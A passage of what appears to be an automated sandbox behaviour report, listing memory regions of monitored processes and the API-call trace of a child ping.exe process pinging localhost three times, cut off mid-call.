start_va = 0x7e840000 end_va = 0x7e862fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e840000" filename = "" Region: id = 6101 start_va = 0x7e868000 end_va = 0x7e868fff entry_point = 0x0 region_type = private name = "private_0x000000007e868000" filename = "" Region: id = 6102 start_va = 0x7e86b000 end_va = 0x7e86dfff entry_point = 0x0 region_type = private name = "private_0x000000007e86b000" filename = "" Region: id = 6103 start_va = 0x7e86e000 end_va = 0x7e86efff entry_point = 0x0 region_type = private name = "private_0x000000007e86e000" filename = "" Region: id = 6104 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6105 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6106 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6107 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 6112 start_va = 0x920000 end_va = 0x92ffff entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 6113 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6114 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6115 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Thread: id = 328 os_tid = 0xb98 Process: id = "121" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0x5e76000" os_pid = "0xba4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "ping -n 3 127.1" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6174 start_va = 0x3c0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 6175 start_va = 0x3e0000 end_va = 0x3e1fff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 6176 start_va = 0x3f0000 end_va = 0x3fefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 6177 start_va = 0x400000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6178 start_va = 0x440000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 6179 start_va = 0x480000 end_va = 0x483fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 6180 start_va = 0x490000 end_va = 0x490fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 6181 start_va = 0x4a0000 end_va = 0x4a1fff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 6182 start_va = 0x940000 end_va = 0x948fff entry_point = 0x940000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe") Region: id = 6183 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6184 start_va = 0x7f2d0000 end_va = 0x7f2f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f2d0000" filename = "" Region: id = 6185 start_va = 0x7f2f5000 end_va = 0x7f2f5fff entry_point = 0x0 region_type = private name = "private_0x000000007f2f5000" filename = "" Region: id = 6186 start_va = 0x7f2fc000 end_va = 0x7f2fefff entry_point = 0x0 region_type = private name = "private_0x000000007f2fc000" filename = "" Region: id = 6187 start_va = 0x7f2ff000 end_va = 0x7f2fffff entry_point = 0x0 region_type = private name = "private_0x000000007f2ff000" filename = "" Region: id = 6188 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6189 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6190 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6191 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 6192 start_va = 0x650000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 6193 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6194 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6195 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6196 start_va = 0x3c0000 end_va = 0x3cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 6197 start_va = 0x3d0000 end_va = 0x3d3fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 6198 start_va = 0x4b0000 end_va = 0x52dfff entry_point = 0x4b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6199 start_va = 0x750000 end_va = 0x84ffff entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 6200 start_va = 0xb00000 end_va = 0xb0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 6201 start_va = 0x73db0000 end_va = 0x73db7fff entry_point = 0x73db0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 6202 start_va = 0x73dc0000 end_va = 0x73dddfff entry_point = 0x73dc0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 6203 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6204 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6205 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6206 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6207 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 6208 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6209 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6210 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6211 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 6212 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6213 start_va = 0x7f1d0000 end_va = 0x7f2cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f1d0000" filename = "" Region: id = 6214 start_va = 0x530000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 6215 start_va = 0x570000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 6216 start_va = 0x7f2f9000 end_va = 0x7f2fbfff entry_point = 0x0 region_type = private name = "private_0x000000007f2f9000" filename = "" Region: id = 6217 start_va = 0x73690000 end_va = 0x736d4fff entry_point = 0x73690000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 6218 start_va = 0x3e0000 end_va = 0x3e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 6219 start_va = 0x5b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 6220 start_va = 0x5c0000 end_va = 0x5c2fff entry_point = 0x5c0000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui") Region: id = 6389 start_va = 0x5d0000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 6390 start_va = 0x610000 end_va = 0x64ffff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 6391 start_va = 0x7f2f6000 end_va = 0x7f2f8fff entry_point = 0x0 region_type = private name = "private_0x000000007f2f6000" filename = "" Thread: id = 332 os_tid = 0xb90 [0117.592] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0117.592] __set_app_type (_Type=0x1) [0117.593] __p__fmode () returned 0x76ea1768 [0117.593] __p__commode () returned 0x76ea176c [0117.593] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x943229) returned 0x0 [0117.593] __wgetmainargs (in: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0, _DoWildCard=0, _StartInfo=0x9440dc | out: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0) returned 0 [0117.593] SetThreadUILanguage (LangId=0x0) returned 0x409 [0117.594] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0117.594] _fileno (_File=0x76ea4c28) returned 1 [0117.594] _get_osfhandle (_FileHandle=1) returned 0x28 [0117.594] GetFileType (hFile=0x28) returned 0x2 [0117.594] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x47f288 | out: lpMode=0x47f288) returned 0 [0117.594] GetLastError () returned 0x6 [0117.595] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x47f1ec, nSize=0x50 | out: lpBuffer="䤐u") returned 0x0 [0117.595] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x945500 | out: lpWSAData=0x945500) returned 0 [0117.597] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x47f2a4 | out: phkResult=0x47f2a4*=0x88) returned 0x0 [0117.597] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x47f298, lpData=0x47f2a0, lpcbData=0x47f29c*=0x4 | out: lpType=0x47f298*=0x0, lpData=0x47f2a0*=0x0, lpcbData=0x47f29c*=0x4) returned 0x2 [0117.597] RegCloseKey (hKey=0x88) returned 0x0 [0117.597] GetAddrInfoW (in: pNodeName="127.1", pServiceName=0x0, pHints=0x47f268*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x47f2a4 | out: ppResult=0x47f2a4*=0x75c278*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7589b8*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) returned 0 [0117.597] FreeAddrInfoW (pAddrInfo=0x75c278*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7589b8*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) [0117.597] IcmpCreateFile () returned 0x756bb8 [0117.600] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x75c160 [0117.600] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x765270 [0117.600] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x47f3a0, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0117.601] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0x47f298, nSize=0x0, Arguments=0x47f294 | out: lpBuffer="竈vﱨG┗\x94䰨盪❋") returned 0x14 [0117.602] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0117.602] _fileno (_File=0x76ea4c28) returned 1 [0117.602] _get_osfhandle (_FileHandle=1) returned 0x28 [0117.602] GetFileType (hFile=0x28) returned 0x2 [0117.602] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x47f25c | out: lpMode=0x47f25c) returned 0 [0117.602] GetLastError () returned 0x6 [0117.602] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x47f1c0, nSize=0x50 | out: lpBuffer="G❋") returned 0x0 [0117.602] _fileno (_File=0x76ea4c28) returned 1 [0117.602] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0117.602] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0117.602] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x767b00 [0117.602] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x767b00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPinging 127.0.0.1 ", lpUsedDefaultChar=0x0) returned 21 [0117.602] _fileno (_File=0x76ea4c28) returned 1 [0117.602] _write (in: _FileHandle=1, _Buf=0x767b00*, _MaxCharCount=0x14 | out: _Buf=0x767b00*) returned 20 [0117.602] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0117.603] _fileno (_File=0x76ea4c28) returned 1 [0117.603] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0117.603] LocalFree (hMem=0x767b00) returned 0x0 [0117.603] LocalFree (hMem=0x767ac8) returned 0x0 [0117.603] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x47f298, nSize=0x0, Arguments=0x47f294 | out: lpBuffer="竈vﱨG▪\x94䰨盪❚") returned 0x18 [0117.603] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0117.603] _fileno (_File=0x76ea4c28) returned 1 [0117.603] _get_osfhandle (_FileHandle=1) returned 0x28 [0117.603] GetFileType (hFile=0x28) returned 0x2 [0117.603] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x47f25c | out: lpMode=0x47f25c) returned 0 [0117.603] GetLastError () returned 0x6 [0117.603] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x47f1c0, nSize=0x50 | out: lpBuffer="G❚") returned 0x0 [0117.603] _fileno (_File=0x76ea4c28) returned 1 [0117.603] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0117.603] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0117.603] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x75c318 [0117.603] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x75c318, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="with 32 bytes of data:\r\n", lpUsedDefaultChar=0x0) returned 25 [0117.603] _fileno (_File=0x76ea4c28) returned 1 [0117.603] _write (in: _FileHandle=1, _Buf=0x75c318*, _MaxCharCount=0x18 | out: _Buf=0x75c318*) returned 24 [0117.603] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0117.603] _fileno (_File=0x76ea4c28) returned 1 [0117.603] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0117.603] LocalFree (hMem=0x75c318) returned 0x0 [0117.603] LocalFree (hMem=0x767ac8) returned 0x0 [0117.603] SetConsoleCtrlHandler (HandlerRoutine=0x941a3d, Add=1) returned 1 [0117.603] IcmpSendEcho2Ex (in: IcmpHandle=0x756bb8, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x75c160, RequestSize=0x20, RequestOptions=0x47f314, ReplyBuffer=0x765270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x765270) returned 0x1 [0117.604] InetNtopW (in: Family=2, pAddr=0x47f304, pStringBuf=0x47f42c, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0117.604] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x47f298, nSize=0x0, Arguments=0x47f294 | out: lpBuffer="笰vﱨG⛔\x94䰨盪✣") returned 0x16 [0117.604] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0117.604] _fileno (_File=0x76ea4c28) returned 1 [0117.604] _get_osfhandle (_FileHandle=1) returned 0x28 [0117.604] GetFileType (hFile=0x28) returned 0x2 [0117.604] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x47f25c | out: lpMode=0x47f25c) returned 0 [0117.604] GetLastError () returned 0x6 [0117.604] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x47f1c0, nSize=0x50 | out: lpBuffer="G✣") returned 0x0 [0117.604] _fileno (_File=0x76ea4c28) returned 1 [0117.604] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0117.604] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0117.604] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x767b68 [0117.604] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x767b68, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0117.604] _fileno (_File=0x76ea4c28) returned 1 [0117.604] _write (in: _FileHandle=1, _Buf=0x767b68*, _MaxCharCount=0x16 | out: _Buf=0x767b68*) returned 22 [0117.604] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0117.604] _fileno (_File=0x76ea4c28) returned 1 [0117.604] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0117.605] LocalFree (hMem=0x767b68) returned 0x0 [0117.605] LocalFree (hMem=0x767b30) returned 0x0 [0117.605] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x47f298, nSize=0x0, Arguments=0x47f294 | out: lpBuffer="笰vﱨG⛿\x94䰨盪✼") returned 0x9 [0117.605] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0117.605] _fileno (_File=0x76ea4c28) returned 1 [0117.605] _get_osfhandle (_FileHandle=1) returned 0x28 [0117.605] GetFileType (hFile=0x28) returned 0x2 [0117.605] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x47f25c | out: lpMode=0x47f25c) returned 0 [0117.605] GetLastError () returned 0x6 [0117.605] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x47f1c0, nSize=0x50 | out: lpBuffer="G✼") returned 0x0 [0117.605] _fileno (_File=0x76ea4c28) returned 1 [0117.605] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0117.605] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0117.605] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x758958 [0117.605] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x758958, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0117.605] _fileno (_File=0x76ea4c28) returned 1 [0117.605] _write (in: _FileHandle=1, _Buf=0x758958*, _MaxCharCount=0x9 | out: _Buf=0x758958*) returned 9 [0117.605] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0117.605] _fileno (_File=0x76ea4c28) returned 1 [0117.605] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0117.605] LocalFree (hMem=0x758958) returned 0x0 [0117.605] LocalFree (hMem=0x767b30) returned 0x0 [0117.605] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x47f29c, nSize=0x0, Arguments=0x47f298 | out: lpBuffer="笰vﱨG➷\x94䰨盪✧") returned 0x9 [0117.605] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0117.605] _fileno (_File=0x76ea4c28) returned 1 [0117.605] _get_osfhandle (_FileHandle=1) returned 0x28 [0117.605] GetFileType (hFile=0x28) returned 0x2 [0117.605] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x47f260 | out: lpMode=0x47f260) returned 0 [0117.605] GetLastError () returned 0x6 [0117.605] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x47f1c4, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0117.605] _fileno (_File=0x76ea4c28) returned 1 [0117.605] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0117.605] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0117.605] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x758a78 [0117.605] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x758a78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0117.605] _fileno (_File=0x76ea4c28) returned 1 [0117.605] _write (in: _FileHandle=1, _Buf=0x758a78*, _MaxCharCount=0x9 | out: _Buf=0x758a78*) returned 9 [0117.605] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0117.605] _fileno (_File=0x76ea4c28) returned 1 [0117.605] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0117.605] LocalFree (hMem=0x758a78) returned 0x0 [0117.605] LocalFree (hMem=0x767b30) returned 0x0 [0117.605] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x47f298, nSize=0x0, Arguments=0x47f294 | out: lpBuffer="笰vﱨG⟘\x94䰨盪✨") returned 0x9 [0117.605] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0117.605] _fileno (_File=0x76ea4c28) returned 1 [0117.605] _get_osfhandle (_FileHandle=1) returned 0x28 [0117.605] GetFileType (hFile=0x28) returned 0x2 [0117.605] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x47f25c | out: lpMode=0x47f25c) returned 0 [0117.605] GetLastError () returned 0x6 [0117.605] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x47f1c0, nSize=0x50 | out: lpBuffer="G✨") returned 0x0 [0117.606] _fileno (_File=0x76ea4c28) returned 1 [0117.606] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0117.606] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0117.606] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x758958 [0117.606] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x758958, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0117.606] _fileno (_File=0x76ea4c28) returned 1 [0117.606] _write (in: _FileHandle=1, _Buf=0x758958*, _MaxCharCount=0x9 | out: _Buf=0x758958*) returned 9 [0117.606] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0117.606] _fileno (_File=0x76ea4c28) returned 1 [0117.606] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0117.606] LocalFree (hMem=0x758958) returned 0x0 [0117.606] LocalFree (hMem=0x767b30) returned 0x0 [0117.606] Sleep (dwMilliseconds=0x3e8) [0118.619] IcmpSendEcho2Ex (in: IcmpHandle=0x756bb8, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x75c160, RequestSize=0x20, RequestOptions=0x47f314, ReplyBuffer=0x765270, ReplySize=0x1ff8, 